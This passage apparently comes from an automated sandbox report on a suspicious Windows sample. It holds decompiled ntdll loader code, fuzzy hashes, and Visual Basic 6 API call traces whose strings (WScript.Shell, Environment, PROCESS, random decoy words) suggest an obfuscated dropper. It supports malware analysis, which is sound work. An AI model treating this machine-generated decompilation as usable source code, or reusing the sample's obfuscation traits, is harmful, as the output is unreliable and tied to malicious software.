                  					goto L8;
                  				} else {
                  					goto L9;
                  				}
                  			}

                  APIs
                  Strings
                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1EB3932A
                  • 0,i, xrefs: 1EAF8E2C
                  • LdrpFindDllActivationContext, xrefs: 1EB39331, 1EB3935D
                  • Querying the active activation context failed with status 0x%08lx, xrefs: 1EB39357
                  • minkernel\ntdll\ldrsnap.c, xrefs: 1EB3933B, 1EB39367
                  Memory Dump Source
                  • Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true
                  • Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp
                  • Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp
                  Similarity
                  • API ID: DebugPrintTimes
                  • String ID: 0,i$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                  • API String ID: 3446177414-3066888582
                  • Opcode ID: e48fbf3450923a08cbb0d9df33459727191ff88dadd67f988ca243a23ae141fc
                  • Instruction ID: 2c7e8a8d440973df9ffccbdf26b15abf52b69f24183c97085723839c3f41e674
                  • Opcode Fuzzy Hash: e48fbf3450923a08cbb0d9df33459727191ff88dadd67f988ca243a23ae141fc
                  • Instruction Fuzzy Hash: 60412332E10372DFDB21AB15CCB8A6EF6B6BB40244F06876AF95557150E770EC80C289
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E1EADD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                  				signed int _v8;
                  				intOrPtr _v20;
                  				signed int _v36;
                  				intOrPtr* _v40;
                  				signed int _v44;
                  				signed int _v48;
                  				signed char _v52;
                  				signed int _v60;
                  				signed int _v64;
                  				signed int _v68;
                  				signed int _v72;
                  				signed int _v76;
                  				intOrPtr _v80;
                  				signed int _v84;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				signed int _v108;
                  				signed int _v112;
                  				signed int _v116;
                  				intOrPtr _v120;
                  				signed int _v132;
                  				char _v140;
                  				char _v144;
                  				char _v157;
                  				signed int _v164;
                  				signed int _v168;
                  				signed int _v169;
                  				intOrPtr _v176;
                  				signed int _v180;
                  				signed int _v184;
                  				intOrPtr _v188;
                  				signed int _v192;
                  				signed int _v200;
                  				signed int _v208;
                  				intOrPtr* _v212;
                  				char _v216;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t204;
                  				signed int _t206;
                  				void* _t208;
                  				signed int _t211;
                  				signed int _t216;
                  				intOrPtr _t217;
                  				intOrPtr* _t218;
                  				signed int _t226;
                  				signed int _t239;
                  				signed int* _t247;
                  				signed int _t249;
                  				void* _t252;
                  				signed int _t256;
                  				signed int _t269;
                  				signed int _t271;
                  				signed int _t277;
                  				signed int _t279;
                  				intOrPtr _t283;
                  				signed int _t287;
                  				signed int _t288;
                  				void* _t289;
                  				signed char _t290;
                  				signed int _t292;
                  				signed int* _t293;
                  				unsigned int _t297;
                  				signed int _t306;
                  				signed int _t307;
                  				signed int _t308;
                  				signed int _t309;
                  				signed int _t310;
                  				intOrPtr _t311;
                  				intOrPtr _t312;
                  				signed int _t319;
                  				signed int _t320;
                  				signed int* _t324;
                  				signed int _t337;
                  				signed int _t338;
                  				signed int _t339;
                  				signed int* _t340;
                  				void* _t341;
                  				signed int _t344;
                  				signed int _t348;
                  				signed int _t349;
                  				signed int _t351;
                  				intOrPtr _t353;
                  				void* _t354;
                  				signed int _t356;
                  				signed int _t358;
                  				intOrPtr _t359;
                  				signed int _t361;
                  				signed int _t363;
                  				signed short* _t365;
                  				void* _t367;
                  				intOrPtr _t369;
                  				void* _t370;
                  				signed int _t371;
                  				signed int _t372;
                  				void* _t374;
                  				signed int _t376;
                  				void* _t384;
                  				signed int _t387;
                  
                  				_v8 =  *0x1ebbd360 ^ _t376;
                  				_t2 =  &_a20;
                  				 *_t2 = _a20 & 0x00000001;
                  				_t287 = _a4;
                  				_v200 = _a12;
                  				_t365 = _a8;
                  				_v212 = _a16;
                  				_v180 = _a24;
                  				_v168 = 0;
                  				_v157 = 0;
                  				if( *_t2 != 0) {
                  					__eflags = E1EAD6600(0x1ebb52d8);
                  					if(__eflags == 0) {
                  						goto L1;
                  					} else {
                  						_v188 = 6;
                  					}
                  				} else {
                  					L1:
                  					_v188 = 9;
                  				}
                  				if(_t365 == 0) {
                  					_v164 = 0;
                  					goto L5;
                  				} else {
                  					_t363 =  *_t365 & 0x0000ffff;
                  					_t341 = _t363 + 1;
                  					if((_t365[1] & 0x0000ffff) < _t341) {
                  						L109:
                  						__eflags = _t341 - 0x80;
                  						if(_t341 <= 0x80) {
                  							_t281 =  &_v140;
                  							_v164 =  &_v140;
                  							goto L114;
                  						} else {
                  							_t283 =  *0x1ebb7b9c; // 0x0
                  							_t281 = L1EAE4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                  							_v164 = _t281;
                  							__eflags = _t281;
                  							if(_t281 != 0) {
                  								_v157 = 1;
                  								L114:
                  								E1EB0F3E0(_t281, _t365[2], _t363);
                  								_t200 = _v164;
                  								 *((char*)(_v164 + _t363)) = 0;
                  								goto L5;
                  							} else {
                  								_t204 = 0xc000009a;
                  								goto L47;
                  							}
                  						}
                  					} else {
                  						_t200 = _t365[2];
                  						_v164 = _t200;
                  						if( *((char*)(_t200 + _t363)) != 0) {
                  							goto L109;
                  						} else {
                  							while(1) {
                  								L5:
                  								_t353 = 0;
                  								_t342 = 0x1000;
                  								_v176 = 0;
                  								if(_t287 == 0) {
                  									break;
                  								}
                  								_t384 = _t287 -  *0x1ebb7b90; // 0x775e0000
                  								if(_t384 == 0) {
                  									_t353 =  *0x1ebb7b8c; // 0x692b48
                  									_v176 = _t353;
                  									_t320 = ( *(_t353 + 0x50))[8];
                  									_v184 = _t320;
                  								} else {
                  									E1EAE2280(_t200, 0x1ebb84d8);
                  									_t277 =  *0x1ebb85f4; // 0x693038
                  									_t351 =  *0x1ebb85f8 & 1;
                  									while(_t277 != 0) {
                  										_t337 =  *(_t277 - 0x50);
                  										if(_t337 > _t287) {
                  											_t338 = _t337 | 0xffffffff;
                  										} else {
                  											asm("sbb ecx, ecx");
                  											_t338 =  ~_t337;
                  										}
                  										_t387 = _t338;
                  										if(_t387 < 0) {
                  											_t339 =  *_t277;
                  											__eflags = _t351;
                  											if(_t351 != 0) {
                  												__eflags = _t339;
                  												if(_t339 == 0) {
                  													goto L16;
                  												} else {
                  													goto L118;
                  												}
                  												goto L151;
                  											} else {
                  												goto L16;
                  											}
                  											goto L17;
                  										} else {
                  											if(_t387 <= 0) {
                  												__eflags = _t277;
                  												if(_t277 != 0) {
                  													_t340 =  *(_t277 - 0x18);
                  													_t24 = _t277 - 0x68; // 0x692fd0
                  													_t353 = _t24;
                  													_v176 = _t353;
                  													__eflags = _t340[3] - 0xffffffff;
                  													if(_t340[3] != 0xffffffff) {
                  														_t279 =  *_t340;
                  														__eflags =  *(_t279 - 0x20) & 0x00000020;
                  														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                  															asm("lock inc dword [edi+0x9c]");
                  															_t340 =  *(_t353 + 0x50);
                  														}
                  													}
                  													_v184 = _t340[8];
                  												}
                  											} else {
                  												_t339 =  *(_t277 + 4);
                  												if(_t351 != 0) {
                  													__eflags = _t339;
                  													if(_t339 == 0) {
                  														goto L16;
                  													} else {
                  														L118:
                  														_t277 = _t277 ^ _t339;
                  														goto L17;
                  													}
                  													goto L151;
                  												} else {
                  													L16:
                  													_t277 = _t339;
                  												}
                  												goto L17;
                  											}
                  										}
                  										goto L25;
                  										L17:
                  									}
                  									L25:
                  									E1EADFFB0(_t287, _t353, 0x1ebb84d8);
                  									_t320 = _v184;
                  									_t342 = 0x1000;
                  								}
                  								if(_t353 == 0) {
                  									break;
                  								} else {
                  									_t366 = 0;
                  									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                  										_t288 = _v164;
                  										if(_t353 != 0) {
                  											_t342 = _t288;
                  											_t374 = E1EB1CC99(_t353, _t288, _v200, 1,  &_v168);
                  											if(_t374 >= 0) {
                  												if(_v184 == 7) {
                  													__eflags = _a20;
                  													if(__eflags == 0) {
                  														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                  														if(__eflags != 0) {
                  															_t271 = E1EAD6600(0x1ebb52d8);
                  															__eflags = _t271;
                  															if(__eflags == 0) {
                  																_t342 = 0;
                  																_v169 = _t271;
                  																_t374 = E1EAD7926( *(_t353 + 0x50), 0,  &_v169);
                  															}
                  														}
                  													}
                  												}
                  												if(_t374 < 0) {
                  													_v168 = 0;
                  												} else {
                  													if( *0x1ebbb239 != 0) {
                  														_t342 =  *(_t353 + 0x18);
                  														E1EB4E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                  													}
                  													if( *0x1ebb8472 != 0) {
                  														_v192 = 0;
                  														_t342 =  *0x7ffe0330;
                  														_t361 =  *0x1ebbb218; // 0x476f9370
                  														asm("ror edi, cl");
                  														 *0x1ebbb1e0( &_v192, _t353, _v168, 0, _v180);
                  														 *(_t361 ^  *0x7ffe0330)();
                  														_t269 = _v192;
                  														_t353 = _v176;
                  														__eflags = _t269;
                  														if(__eflags != 0) {
                  															_v168 = _t269;
                  														}
                  													}
                  												}
                  											}
                  											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                  												_t366 = 0xc000007a;
                  											}
                  											_t247 =  *(_t353 + 0x50);
                  											if(_t247[3] == 0xffffffff) {
                  												L40:
                  												if(_t366 == 0xc000007a) {
                  													__eflags = _t288;
                  													if(_t288 == 0) {
                  														goto L136;
                  													} else {
                  														_t366 = 0xc0000139;
                  													}
                  													goto L54;
                  												}
                  											} else {
                  												_t249 =  *_t247;
                  												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                  													goto L40;
                  												} else {
                  													_t250 = _t249 | 0xffffffff;
                  													asm("lock xadd [edi+0x9c], eax");
                  													if((_t249 | 0xffffffff) == 0) {
                  														E1EAE2280(_t250, 0x1ebb84d8);
                  														_t342 =  *(_t353 + 0x54);
                  														_t165 = _t353 + 0x54; // 0x54
                  														_t252 = _t165;
                  														__eflags =  *(_t342 + 4) - _t252;
                  														if( *(_t342 + 4) != _t252) {
                  															L135:
                  															asm("int 0x29");
                  															L136:
                  															_t288 = _v200;
                  															_t366 = 0xc0000138;
                  															L54:
                  															_t342 = _t288;
                  															L1EB03898(0, _t288, _t366);
                  														} else {
                  															_t324 =  *(_t252 + 4);
                  															__eflags =  *_t324 - _t252;
                  															if( *_t324 != _t252) {
                  																goto L135;
                  															} else {
                  																 *_t324 = _t342;
                  																 *(_t342 + 4) = _t324;
                  																_t293 =  *(_t353 + 0x50);
                  																_v180 =  *_t293;
                  																E1EADFFB0(_t293, _t353, 0x1ebb84d8);
                  																__eflags =  *((short*)(_t353 + 0x3a));
                  																if( *((short*)(_t353 + 0x3a)) != 0) {
                  																	_t342 = 0;
                  																	__eflags = 0;
                  																	E1EB037F5(_t353, 0);
                  																}
                  																E1EB00413(_t353);
                  																_t256 =  *(_t353 + 0x48);
                  																__eflags = _t256;
                  																if(_t256 != 0) {
                  																	__eflags = _t256 - 0xffffffff;
                  																	if(_t256 != 0xffffffff) {
                  																		E1EAF9B10(_t256);
                  																	}
                  																}
                  																__eflags =  *(_t353 + 0x28);
                  																if( *(_t353 + 0x28) != 0) {
                  																	_t174 = _t353 + 0x24; // 0x24
                  																	E1EAF02D6(_t174);
                  																}
                  																L1EAE77F0( *0x1ebb7b98, 0, _t353);
                  																__eflags = _v180 - _t293;
                  																if(__eflags == 0) {
                  																	E1EAFC277(_t293, _t366);
                  																}
                  																_t288 = _v164;
                  																goto L40;
                  															}
                  														}
                  													} else {
                  														goto L40;
                  													}
                  												}
                  											}
                  										}
                  									} else {
                  										L1EADEC7F(_t353);
                  										L1EAF19B8(_t287, 0, _t353, 0);
                  										_t200 = E1EACF4E3(__eflags);
                  										continue;
                  									}
                  								}
                  								L41:
                  								if(_v157 != 0) {
                  									L1EAE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                  								}
                  								if(_t366 < 0) {
                  									L46:
                  									 *_v212 = _v168;
                  									_t204 = _t366;
                  									L47:
                  									_pop(_t354);
                  									_pop(_t367);
                  									_pop(_t289);
                  									return E1EB0B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                  								} else {
                  									_t206 =  *0x1ebbb2f8; // 0x0
                  									if((_t206 |  *0x1ebbb2fc) == 0 || ( *0x1ebbb2e4 & 0x00000001) != 0) {
                  										goto L46;
                  									} else {
                  										_t297 =  *0x1ebbb2ec; // 0x0
                  										_v200 = 0;
                  										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                  											_t355 = _v168;
                  											_t342 =  &_v208;
                  											_t208 = E1EB76B68(_v168,  &_v208, _v168, __eflags);
                  											__eflags = _t208 - 1;
                  											if(_t208 == 1) {
                  												goto L46;
                  											} else {
                  												__eflags = _v208 & 0x00000010;
                  												if((_v208 & 0x00000010) == 0) {
                  													goto L46;
                  												} else {
                  													_t342 = 4;
                  													_t366 = E1EB76AEB(_t355, 4,  &_v216);
                  													__eflags = _t366;
                  													if(_t366 >= 0) {
                  														goto L46;
                  													} else {
                  														asm("int 0x29");
                  														_t356 = 0;
                  														_v44 = 0;
                  														_t290 = _v52;
                  														__eflags = 0;
                  														if(0 == 0) {
                  															L108:
                  															_t356 = 0;
                  															_v44 = 0;
                  															goto L63;
                  														} else {
                  															__eflags = 0;
                  															if(0 < 0) {
                  																goto L108;
                  															}
                  															L63:
                  															_v112 = _t356;
                  															__eflags = _t356;
                  															if(_t356 == 0) {
                  																L143:
                  																_v8 = 0xfffffffe;
                  																_t211 = 0xc0000089;
                  															} else {
                  																_v36 = 0;
                  																_v60 = 0;
                  																_v48 = 0;
                  																_v68 = 0;
                  																_v44 = _t290 & 0xfffffffc;
                  																E1EADE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                  																_t306 = _v68;
                  																__eflags = _t306;
                  																if(_t306 == 0) {
                  																	_t216 = 0xc000007b;
                  																	_v36 = 0xc000007b;
                  																	_t307 = _v60;
                  																} else {
                  																	__eflags = _t290 & 0x00000001;
                  																	if(__eflags == 0) {
                  																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                  																		__eflags = _t349 - 0x10b;
                  																		if(_t349 != 0x10b) {
                  																			__eflags = _t349 - 0x20b;
                  																			if(_t349 == 0x20b) {
                  																				goto L102;
                  																			} else {
                  																				_t307 = 0;
                  																				_v48 = 0;
                  																				_t216 = 0xc000007b;
                  																				_v36 = 0xc000007b;
                  																				goto L71;
                  																			}
                  																		} else {
                  																			L102:
                  																			_t307 =  *(_t306 + 0x50);
                  																			goto L69;
                  																		}
                  																		goto L151;
                  																	} else {
                  																		_t239 = L1EADEAEA(_t290, _t290, _t356, _t366, __eflags);
                  																		_t307 = _t239;
                  																		_v60 = _t307;
                  																		_v48 = _t307;
                  																		__eflags = _t307;
                  																		if(_t307 != 0) {
                  																			L70:
                  																			_t216 = _v36;
                  																		} else {
                  																			_push(_t239);
                  																			_push(0x14);
                  																			_push( &_v144);
                  																			_push(3);
                  																			_push(_v44);
                  																			_push(0xffffffff);
                  																			_t319 = E1EB09730();
                  																			_v36 = _t319;
                  																			__eflags = _t319;
                  																			if(_t319 < 0) {
                  																				_t216 = 0xc000001f;
                  																				_v36 = 0xc000001f;
                  																				_t307 = _v60;
                  																			} else {
                  																				_t307 = _v132;
                  																				L69:
                  																				_v48 = _t307;
                  																				goto L70;
                  																			}
                  																		}
                  																	}
                  																}
                  																L71:
                  																_v72 = _t307;
                  																_v84 = _t216;
                  																__eflags = _t216 - 0xc000007b;
                  																if(_t216 == 0xc000007b) {
                  																	L150:
                  																	_v8 = 0xfffffffe;
                  																	_t211 = 0xc000007b;
                  																} else {
                  																	_t344 = _t290 & 0xfffffffc;
                  																	_v76 = _t344;
                  																	__eflags = _v40 - _t344;
                  																	if(_v40 <= _t344) {
                  																		goto L150;
                  																	} else {
                  																		__eflags = _t307;
                  																		if(_t307 == 0) {
                  																			L75:
                  																			_t217 = 0;
                  																			_v104 = 0;
                  																			__eflags = _t366;
                  																			if(_t366 != 0) {
                  																				__eflags = _t290 & 0x00000001;
                  																				if((_t290 & 0x00000001) != 0) {
                  																					_t217 = 1;
                  																					_v104 = 1;
                  																				}
                  																				_t290 = _v44;
                  																				_v52 = _t290;
                  																			}
                  																			__eflags = _t217 - 1;
                  																			if(_t217 != 1) {
                  																				_t369 = 0;
                  																				_t218 = _v40;
                  																				goto L91;
                  																			} else {
                  																				_v64 = 0;
                  																				E1EADE9C0(1, _t290, 0, 0,  &_v64);
                  																				_t309 = _v64;
                  																				_v108 = _t309;
                  																				__eflags = _t309;
                  																				if(_t309 == 0) {
                  																					goto L143;
                  																				} else {
                  																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                  																					__eflags = _t226 - 0x10b;
                  																					if(_t226 != 0x10b) {
                  																						__eflags = _t226 - 0x20b;
                  																						if(_t226 != 0x20b) {
                  																							goto L143;
                  																						} else {
                  																							_t371 =  *(_t309 + 0x98);
                  																							goto L83;
                  																						}
                  																					} else {
                  																						_t371 =  *(_t309 + 0x88);
                  																						L83:
                  																						__eflags = _t371;
                  																						if(_t371 != 0) {
                  																							_v80 = _t371 - _t356 + _t290;
                  																							_t310 = _v64;
                  																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                  																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                  																							_t311 = 0;
                  																							__eflags = 0;
                  																							while(1) {
                  																								_v120 = _t311;
                  																								_v116 = _t348;
                  																								__eflags = _t311 - _t292;
                  																								if(_t311 >= _t292) {
                  																									goto L143;
                  																								}
                  																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                  																								__eflags = _t371 - _t359;
                  																								if(_t371 < _t359) {
                  																									L98:
                  																									_t348 = _t348 + 0x28;
                  																									_t311 = _t311 + 1;
                  																									continue;
                  																								} else {
                  																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                  																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                  																										goto L98;
                  																									} else {
                  																										__eflags = _t348;
                  																										if(_t348 == 0) {
                  																											goto L143;
                  																										} else {
                  																											_t218 = _v40;
                  																											_t312 =  *_t218;
                  																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                  																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                  																												_v100 = _t359;
                  																												_t360 = _v108;
                  																												_t372 = L1EAD8F44(_v108, _t312);
                  																												__eflags = _t372;
                  																												if(_t372 == 0) {
                  																													goto L143;
                  																												} else {
                  																													_t290 = _v52;
                  																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E1EB03C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                  																													_t307 = _v72;
                  																													_t344 = _v76;
                  																													_t218 = _v40;
                  																													goto L91;
                  																												}
                  																											} else {
                  																												_t290 = _v52;
                  																												_t307 = _v72;
                  																												_t344 = _v76;
                  																												_t369 = _v80;
                  																												L91:
                  																												_t358 = _a4;
                  																												__eflags = _t358;
                  																												if(_t358 == 0) {
                  																													L95:
                  																													_t308 = _a8;
                  																													__eflags = _t308;
                  																													if(_t308 != 0) {
                  																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                  																													}
                  																													_v8 = 0xfffffffe;
                  																													_t211 = _v84;
                  																												} else {
                  																													_t370 =  *_t218 - _t369 + _t290;
                  																													 *_t358 = _t370;
                  																													__eflags = _t370 - _t344;
                  																													if(_t370 <= _t344) {
                  																														L149:
                  																														 *_t358 = 0;
                  																														goto L150;
                  																													} else {
                  																														__eflags = _t307;
                  																														if(_t307 == 0) {
                  																															goto L95;
                  																														} else {
                  																															__eflags = _t370 - _t344 + _t307;
                  																															if(_t370 >= _t344 + _t307) {
                  																																goto L149;
                  																															} else {
                  																																goto L95;
                  																															}
                  																														}
                  																													}
                  																												}
                  																											}
                  																										}
                  																									}
                  																								}
                  																								goto L97;
                  																							}
                  																						}
                  																						goto L143;
                  																					}
                  																				}
                  																			}
                  																		} else {
                  																			__eflags = _v40 - _t307 + _t344;
                  																			if(_v40 >= _t307 + _t344) {
                  																				goto L150;
                  																			} else {
                  																				goto L75;
                  																			}
                  																		}
                  																	}
                  																}
                  															}
                  															L97:
                  															 *[fs:0x0] = _v20;
                  															return _t211;
                  														}
                  													}
                  												}
                  											}
                  										} else {
                  											goto L46;
                  										}
                  									}
                  								}
                  								goto L151;
                  							}
                  							_t288 = _v164;
                  							_t366 = 0xc0000135;
                  							goto L41;
                  						}
                  					}
                  				}
                  				L151:
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true
                  • Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp
                  • Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp
                  Similarity
                  • API ID: DebugPrintTimes
                  • String ID: 80i$H+i
                  • API String ID: 3446177414-2239751774
                  • Opcode ID: 4e7158c420417228263a646a4c9ff34dd835f17dbf3a5fdd73f2d57c5c878219
                  • Instruction ID: 4375739909c2277d3c0922dafd0fb502a49b104c47f3971c59b94cc75f885f8c
                  • Opcode Fuzzy Hash: 4e7158c420417228263a646a4c9ff34dd835f17dbf3a5fdd73f2d57c5c878219
                  • Instruction Fuzzy Hash: 1CE1B434A00396CFDB24CF25C990BA9BBB2BF45314F1543E9D9099B290DB34AD89CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 00415984
                  • #582.MSVBVM60(36680000,4202A278), ref: 00415990
                  • __vbaFpR8.MSVBVM60 ref: 00415996
                  • __vbaStrCopy.MSVBVM60 ref: 004159B9
                  • #712.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159CD
                  • __vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159DE
                  • __vbaStrCopy.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E4
                  • __vbaFreeStr.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159E9
                  • #512.MSVBVM60(NAVIGATIONSSKOLERNES,00000081,?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 004159F9
                  • __vbaStrMove.MSVBVM60(?,Nonincreasing1,Preludiet5,00000001,000000FF,00000000), ref: 00415A04
                  • __vbaVarDup.MSVBVM60 ref: 00415A22
                  • #558.MSVBVM60(?), ref: 00415A2C
                  • __vbaFreeVar.MSVBVM60 ref: 00415A49
                  • #716.MSVBVM60(?,WScript.Shell,00000000), ref: 00415A5F
                  • __vbaObjVar.MSVBVM60(?), ref: 00415A69
                  • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00415A74
                  • __vbaFreeVar.MSVBVM60 ref: 00415A7D
                  • __vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001), ref: 00415ADB
                  • __vbaVarLateMemCallLd.MSVBVM60(?,00000000), ref: 00415AE9
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00415AF3
                  • __vbaStrMove.MSVBVM60 ref: 00415AFE
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415B0A
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415B26
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415B4B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,0000013C), ref: 00415B9C
                  • __vbaFreeObj.MSVBVM60 ref: 00415BA5
                  • #610.MSVBVM60(?), ref: 00415BBB
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 00415BC9
                  • #540.MSVBVM60(?,00000000), ref: 00415BD4
                  • _adj_fdiv_m64.MSVBVM60 ref: 00415BFD
                  • _adj_fdiv_m64.MSVBVM60 ref: 00415C29
                  • __vbaVarTstGe.MSVBVM60(?,?), ref: 00415C40
                  • __vbaFreeStr.MSVBVM60(?,?), ref: 00415C4C
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00415C5C
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415C81
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415CA6
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 00415CD3
                  • __vbaFreeObj.MSVBVM60 ref: 00415CED
                  • #539.MSVBVM60(?,0000009D,000000BE,000000E5), ref: 00415D06
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415D10
                  • __vbaStrMove.MSVBVM60 ref: 00415D1B
                  • __vbaStrCopy.MSVBVM60 ref: 00415D25
                  • __vbaFreeStr.MSVBVM60 ref: 00415D2E
                  • __vbaFreeVar.MSVBVM60 ref: 00415D37
                  • __vbaFreeObj.MSVBVM60(00415D8A), ref: 00415D6E
                  • __vbaFreeStr.MSVBVM60 ref: 00415D7D
                  • __vbaFreeStr.MSVBVM60 ref: 00415D82
                  • __vbaFreeStr.MSVBVM60 ref: 00415D87
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$CheckCopyHresult$CallLateListNew2_adj_fdiv_m64$#512#539#540#558#582#610#712#716Addref
                  • String ID: Brasiliansk$Environment$Item$NAVIGATIONSSKOLERNES$Nonincreasing1$PROCESS$PRODUKTUDVIKLER$Preludiet5$WINDIR$WScript.Shell$ctf
                  • API String ID: 4167868168-594783680
                  • Opcode ID: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
                  • Instruction ID: bdfed9ac7365b67e29146c59590f7b3a1cc87b8179bb4dd4a60cd4cce7d5f936
                  • Opcode Fuzzy Hash: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
                  • Instruction Fuzzy Hash: 43D12B75900209EBDB04DFA4DE89ADEBBB4FF48704F10816AF505B72A0DB746985CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaChkstk.MSVBVM60(?,00401326), ref: 004153AE
                  • #693.MSVBVM60(Digitalkamera,?,?,?,?,00401326), ref: 004153E1
                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401326), ref: 004153FA
                  • #578.MSVBVM60(Bfferne,?,?,?,?,00401326), ref: 0041540C
                  • #517.MSVBVM60(Scapularies,?,?,?,?,00401326), ref: 00415427
                  • __vbaStrMove.MSVBVM60(?,?,?,?,00401326), ref: 00415432
                  • #610.MSVBVM60(?,?,?,?,?,00401326), ref: 00415443
                  • #662.MSVBVM60(?,00402C74,?,00000002,00000001,00000001), ref: 0041546C
                  • #696.MSVBVM60(Formaliaernes9), ref: 00415477
                  • __vbaVarTstGt.MSVBVM60(00008002,?), ref: 00415499
                  • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004154B4
                  • __vbaFPInt.MSVBVM60(?,?,?,00401326), ref: 004154D9
                  • #702.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 004154F5
                  • __vbaStrMove.MSVBVM60 ref: 00415500
                  • __vbaStrCopy.MSVBVM60 ref: 00415511
                  • __vbaFreeStr.MSVBVM60 ref: 0041551A
                  • __vbaFreeVar.MSVBVM60 ref: 00415523
                  • #608.MSVBVM60(00000004,00000052), ref: 00415536
                  • __vbaStrVarMove.MSVBVM60(00000004), ref: 00415540
                  • __vbaStrMove.MSVBVM60 ref: 0041554B
                  • __vbaFreeVar.MSVBVM60 ref: 00415554
                  • __vbaVarDup.MSVBVM60 ref: 0041557B
                  • #544.MSVBVM60(?,?), ref: 00415589
                  • __vbaVarTstGt.MSVBVM60(00008002,?), ref: 004155AE
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004155C5
                  • __vbaNew2.MSVBVM60(004029E8,0041746C,?,?,?,?,?,?,00401326), ref: 004155F7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029D8,00000014), ref: 0041565D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000060), ref: 004156BA
                  • __vbaStrCopy.MSVBVM60 ref: 004156DE
                  • __vbaFreeStr.MSVBVM60 ref: 004156E7
                  • __vbaFreeObj.MSVBVM60 ref: 004156F0
                  • __vbaStrCat.MSVBVM60(Unregenerable1,?), ref: 0041570C
                  • __vbaStrMove.MSVBVM60 ref: 00415717
                  • __vbaStrCopy.MSVBVM60 ref: 00415728
                  • __vbaFreeStr.MSVBVM60 ref: 00415731
                  • __vbaFreeStr.MSVBVM60(0041578E), ref: 0041577E
                  • __vbaFreeStr.MSVBVM60 ref: 00415787
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$Copy$CheckHresultList$#517#544#578#608#610#662#693#696#702ChkstkErrorNew2
